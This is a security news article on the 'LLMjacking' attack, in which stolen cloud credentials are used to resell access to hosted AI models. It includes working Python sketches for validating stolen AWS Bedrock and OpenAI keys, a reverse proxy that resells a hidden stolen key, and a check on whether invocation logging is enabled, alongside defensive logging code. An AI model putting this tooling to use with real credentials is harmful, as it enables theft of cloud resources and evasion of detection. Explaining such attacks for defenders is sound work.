New ‘LLMjacking’ Attack Exploits Cloud-Hosted AI Models
May 10, 2024
The Sysdig Threat Research Team has identified a new form of cyberattack it calls 'LLMjacking.' The scheme uses stolen cloud credentials to target cloud-hosted large language models (LLMs), with the ultimate goal of selling access to those models to other cybercriminals.
The attack begins with initial access gained by exploiting CVE-2021-3129, a remote code execution vulnerability affecting a vulnerable version of the Laravel Framework. "Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers," said security researcher Alessandro Brucato. In the incident Sysdig observed, the target was an Anthropic Claude (v2/v3) model.
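To illustrate how stolen AWS credentials can be cheaply tested against a hosted model, consider the following sketch (this is not Sysdig's reproduction of the attackers' tooling; the key values and model ID are placeholders). A deliberately malformed Bedrock invocation is typically enough to distinguish "no access" from "access granted" based on the error returned:

```python
import boto3
from botocore.exceptions import ClientError

# Illustrative only: probing what a stolen AWS key can do on Bedrock.
# The access key, secret, region, and model ID below are placeholders.
session = boto3.Session(
    aws_access_key_id="AKIA...",      # stolen credential (placeholder)
    aws_secret_access_key="...",      # stolen credential (placeholder)
    region_name="us-east-1",
)
bedrock = session.client("bedrock-runtime")

try:
    # An empty body is invalid, but the error it triggers reveals
    # whether the key is authorized to invoke the model at all.
    bedrock.invoke_model(modelId="anthropic.claude-v2", body="{}")
except ClientError as err:
    code = err.response["Error"]["Code"]
    if code == "AccessDeniedException":
        print("Key cannot invoke this model")
    elif code == "ValidationException":
        print("Key can invoke the model (only the request body was rejected)")
```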
The attackers use an open-source Python script, referred to as a keychecker, to check and validate keys for offerings from Anthropic, AWS Bedrock, Google Cloud Vertex AI, Mistral, and OpenAI, among others. Notably, no legitimate LLM queries were run during this verification phase. "Instead, just enough was done to figure out what the credentials were capable of and any quotas," Brucato explained.
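That "just enough" approach is possible because most providers expose inexpensive metadata endpoints. The sketch below shows the general verification pattern against OpenAI's API; it is not the actual keychecker code, and the key value is a placeholder:

```python
import requests

def check_openai_key(key: str) -> bool:
    """Probe an OpenAI key without spending tokens: listing models is a
    metadata call, not a completion, yet a 200 response proves the key
    is live and shows which models it can reach."""
    resp = requests.get(
        "https://api.openai.com/v1/models",
        headers={"Authorization": f"Bearer {key}"},
        timeout=10,
    )
    if resp.status_code == 200:
        models = [m["id"] for m in resp.json()["data"]]
        print(f"valid key, {len(models)} models visible")
        return True
    return False  # 401 = invalid/revoked; 429 = rate- or quota-limited

check_openai_key("sk-...")  # placeholder for a harvested key
```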
The keychecker is integrated with another open-source tool, oai-reverse-proxy, which acts as a reverse proxy server for LLM APIs. This suggests the attackers are providing access to the compromised accounts without exposing the underlying credentials. "If the attackers were gathering an inventory of useful credentials and wanted to sell access to the available LLM models, a reverse proxy like this could allow them to monetize their efforts," Brucato added.
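In broad strokes, the reverse-proxy pattern works as follows (a minimal sketch of the concept, not the oai-reverse-proxy codebase; the upstream URL and key are placeholders). Buyers send requests to the proxy, which injects the stolen key server-side before forwarding them upstream:

```python
from flask import Flask, request, Response
import requests

UPSTREAM = "https://api.openai.com"
HIDDEN_KEY = "sk-..."  # the compromised key never leaves the proxy

app = Flask(__name__)

@app.route("/v1/<path:path>", methods=["GET", "POST"])
def proxy(path):
    # Forward the client's request upstream, swapping in the stolen
    # credential. Streaming responses are omitted for brevity.
    upstream = requests.request(
        method=request.method,
        url=f"{UPSTREAM}/v1/{path}",
        headers={
            "Authorization": f"Bearer {HIDDEN_KEY}",
            "Content-Type": "application/json",
        },
        data=request.get_data(),
        timeout=120,
    )
    return Response(
        upstream.content,
        status=upstream.status_code,
        content_type=upstream.headers.get("Content-Type"),
    )

if __name__ == "__main__":
    app.run(port=8080)
```

Because the Authorization header is added by the proxy, buyers can consume the stolen quota without ever seeing a credential that could be reported or rotated.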
The attackers were also observed querying logging settings, presumably to avoid detection when using the compromised credentials to run their prompts. This marks a shift from attacks focused on model poisoning and prompt injection: here the attackers monetize their access to the LLMs while the owner of the cloud account unknowingly foots the bill. According to Sysdig, an attack of this nature could cost the victim over $46,000 in LLM consumption costs per day.
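On AWS Bedrock, for instance, that kind of reconnaissance can be a single API call (a sketch assuming boto3; whether this is the exact call used in the observed attack is not confirmed here):

```python
import boto3

# Sketch of the reconnaissance described above: one Bedrock API call
# reveals whether prompts and completions are being logged.
bedrock = boto3.client("bedrock", region_name="us-east-1")
config = bedrock.get_model_invocation_logging_configuration()

logging_cfg = config.get("loggingConfig")
if not logging_cfg:
    print("Invocation logging disabled: prompts would leave little trace")
else:
    print("Logging enabled:", logging_cfg)
```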
Brucato also pointed out that LLM services can be quite costly, depending on the model and the number of tokens fed to it. And by maxing out quota limits, attackers can block the compromised organization from using its models legitimately, disrupting business operations. To defend against such attacks, organizations are advised to enable detailed logging, monitor cloud logs for suspicious or unauthorized activity, and maintain effective vulnerability management processes.
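The defensive counterpart of the logging check above is straightforward to enable on Bedrock (a sketch; the bucket, log group, and role names are placeholders):

```python
import boto3

# Enable Bedrock model-invocation logging so every prompt and completion
# is delivered to S3 and CloudWatch, where unauthorized usage can be
# spotted and alerted on.
bedrock = boto3.client("bedrock", region_name="us-east-1")
bedrock.put_model_invocation_logging_configuration(
    loggingConfig={
        "textDataDeliveryEnabled": True,
        "s3Config": {
            "bucketName": "my-bedrock-audit-logs",  # placeholder
            "keyPrefix": "bedrock/",
        },
        "cloudWatchConfig": {
            "logGroupName": "/bedrock/invocations",  # placeholder
            "roleArn": "arn:aws:iam::123456789012:role/BedrockLogs",  # placeholder
        },
    }
)
```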